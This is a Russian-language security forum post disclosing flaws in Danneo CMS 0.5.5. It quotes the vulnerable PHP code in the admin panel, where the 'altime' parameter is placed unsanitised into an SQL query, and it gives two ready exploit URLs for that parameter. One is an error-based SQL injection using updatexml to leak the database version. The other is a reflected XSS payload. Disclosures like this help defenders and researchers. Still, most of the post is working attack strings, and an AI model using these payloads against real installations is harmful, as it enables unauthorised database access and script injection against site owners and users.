Показать сообщение отдельно

  #7  
Старый 16.04.2014, 09:45
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418

Репутация: 652


По умолчанию

Danneo CMS 0.5.5

Danneo CMS 0.5.5

SQL Injection



Уязвимый сценарий
: http://127.0.0.1/cms_danneo/www/apanel/index.php

Уязвимый параметр: altime

Вектор: error-based

Требования: mq = off, права администратора

Уязвимый код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]) && !empty([/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"];

} else {

[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$ADMIN_LAST[/COLOR][COLOR="#007700"];

}

...

[/
COLOR][COLOR="#0000BB"]$unewspid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchrow[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) AS total FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$basepref[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_news_user WHERE (public >= '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$altime[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]));

[/
COLOR][/COLOR
Exploit:

[127.0.0.1/cms_danneo/www/apanel/index.php?dn=index&altime=1397482241'or(updatexml(1,concat(0x3a,version()),4))or'--&ops=your_data]

passive XSS (reflected)

Уязвим этот же праметр altime.

Exploit:

[127.0.0.1/cms_danneo/www/apanel/index.php?dn=index&altime=1397482241">alert(1)&ops=your_data]
 
Ответить с цитированием